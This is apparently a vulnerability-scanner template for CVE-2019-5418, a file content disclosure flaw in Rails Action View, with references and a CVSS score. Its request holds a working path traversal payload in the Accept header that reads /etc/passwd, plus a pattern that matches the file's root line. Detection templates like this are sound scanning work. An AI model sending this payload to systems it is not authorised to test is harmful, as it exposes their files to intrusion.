id: CVE-2019-5418 info: name: File Content Disclosure on Rails author: omarkurt severity: high description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ tags: cve,cve2019,rails,lfi,disclosure classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2019-5418 requests: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:" part: body